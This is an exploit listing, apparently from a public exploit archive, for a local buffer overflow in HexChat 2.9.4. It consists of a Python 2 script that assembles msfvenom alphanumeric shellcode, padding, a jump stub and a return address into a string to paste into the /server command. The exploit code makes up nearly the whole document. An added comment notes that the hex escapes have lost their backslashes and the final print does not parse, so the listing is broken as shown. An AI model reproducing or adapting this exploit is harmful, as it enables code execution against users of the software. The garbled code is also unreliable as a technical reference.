
# Title : HexChat 2.9.4 Local Exploit Submission
# Published : 2013-04-07
# Author :


#!/usr/bin/python
# HexChat 2.9.4 Local Exploit
# Bug found by Jules Carter < @iMulitia >
# Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com >
# http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html
#
# Proof-of-concept generator. The script only concatenates a handful of
# string constants and prints the result; it never contacts HexChat itself.
# Python 2 syntax (print statement, no parentheses).
#
# NOTE(review): every hex escape in this listing reads "x54" rather than
# "\x54", so the backslashes were most likely stripped when the page was
# extracted. As shown, the literals are plain ASCII text, not the byte
# sequences the inline comments describe ("JA", "PPR", "POPAD", ...), and
# the final print nests unescaped double quotes and would not parse. Read
# the listing as documentation of the payload layout, not as runnable code.
#
# Layout of the printed string, left to right:
#   junk1 (30) | shellcode + junk2 (13306 together; junk2 is sized to fill
#   whatever shellcode does not) | stage1 (4) | ret (4) | junk3 (29) |
#   stage2 (40) | junk4 (11586)
# With one byte per escape that is 24999 bytes in total, a figure worth
# noting for anyone building a length-based check on the /server argument.

# 30 bytes of filler ahead of the shellcode.
junk1 = "B"*30
shellcode = (
# msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c
# Alphanumeric-encoded payload (per the msfvenom line above); the sum of the
# literals below is what len(shellcode) measures for junk2.
"x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b"
"x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58"
"x50x38x41x42x75x4ax49x78x59x68x6bx6dx4bx4bx69"
"x44x34x64x64x59x64x74x71x78x52x6cx72x33x47x34"
"x71x78x49x42x44x4ex6bx50x71x50x30x4ex6bx64x36"
"x54x4cx4cx4bx44x36x77x6cx4cx4bx33x76x77x78x4c"
"x4bx73x4ex51x30x4ex6bx75x66x56x58x72x6fx72x38"
"x51x65x68x73x43x69x37x71x38x51x39x6fx58x61x73"
"x50x4ex6bx30x6cx36x44x77x54x6cx4bx42x65x75x6c"
"x6ex6bx73x64x36x48x31x68x46x61x6ax4ax4ex6bx52"
"x6ax66x78x6ex6bx73x6ax57x50x43x31x7ax4bx6dx33"
"x34x74x42x69x6cx4bx47x44x4cx4bx67x71x48x6ex74"
"x71x6bx4fx36x51x79x50x6bx4cx4ex4cx4cx44x39x50"
"x34x34x75x57x49x51x4ax6fx36x6dx67x71x4ax67x5a"
"x4bx5ax54x67x4bx71x6cx61x34x34x68x32x55x6dx31"
"x6ex6bx33x6ax47x54x76x61x38x6bx71x76x4cx4bx64"
"x4cx52x6bx4ex6bx71x4ax67x6cx67x71x4ax4bx4ex6b"
"x74x44x4cx4bx76x61x69x78x4ex69x62x64x66x44x47"
"x6cx63x51x5ax63x6ex52x33x38x61x39x69x44x6bx39"
"x59x75x6cx49x58x42x73x58x4ex6ex72x6ex56x6ex58"
"x6cx62x72x4dx38x4fx6fx6bx4fx69x6fx69x6fx4fx79"
"x61x55x75x54x6dx6bx31x6ex4ex38x79x72x70x73x6f"
"x77x45x4cx45x74x70x52x39x78x6cx4ex4bx4fx49x6f"
"x59x6fx6fx79x43x75x55x58x73x58x62x4cx70x6cx51"
"x30x77x31x53x58x67x43x54x72x66x4ex61x74x71x78"
"x52x55x44x33x62x45x61x62x6dx58x51x4cx75x74x57"
"x7ax4cx49x58x66x73x66x6bx4fx30x55x47x74x6bx39"
"x4fx32x72x70x4dx6bx39x38x6dx72x72x6dx4fx4cx4b"
"x37x35x4cx67x54x30x52x5ax48x75x31x39x6fx6bx4f"
"x39x6fx33x58x42x4fx34x38x53x68x31x30x72x48x35"
"x31x73x57x61x75x62x62x35x38x72x6dx72x45x54x33"
"x62x53x54x71x69x4bx6fx78x33x6cx75x74x54x4ax6f"
"x79x78x63x61x78x72x78x45x70x77x50x75x70x70x68"
"x72x6dx50x53x37x36x77x51x70x68x43x42x30x6fx42"
"x4dx71x30x35x38x52x4fx66x4cx31x30x61x76x61x78"
"x71x58x50x65x42x4cx32x4cx55x61x5ax69x6ex68x72"
"x6cx61x34x44x50x4fx79x4dx31x56x51x4bx62x33x62"
"x61x43x46x31x52x72x39x6fx58x50x46x51x49x50x42"
"x70x69x6fx36x35x34x48x41x41"
)
# Pad so that shellcode + junk2 is always exactly 13306 characters; the
# fixed offsets that follow depend on this span not moving.
junk2 = "A"*(13306-len(shellcode))
# Four-character stage-1 stub (the author's comment names it a 21-byte
# forward jump); its exact bytes cannot be recovered from this listing.
stage1 = "x4cx4cx77x21" # 21 byte jump (JA)
# Return address as four characters; "ASCII PPR" is the author's label.
ret = "x63x64x62x68" # ASCII PPR
# 29 bytes skipped over by stage1 before stage2 begins.
junk3 = "C"*29
stage2 = "x61"*38 # POPAD x 38
stage2 += "x54" # PUSH ESP
stage2 += "xE9" # RETN # This byte is a bad char, but gets converted to RETN and x88
# Trailing filler; together with the earlier parts this fixes the total
# length at 24999 when each escape is one byte.
junk4 = "D"*11586

# Output only: the user is told where to paste the string; the script itself
# performs no network or process interaction.
print "Copy this text, and enter into HexChat's textbox: "/server [string]"" 
print junk1 + shellcode + junk2 + stage1 + ret + junk3 + stage2 + junk4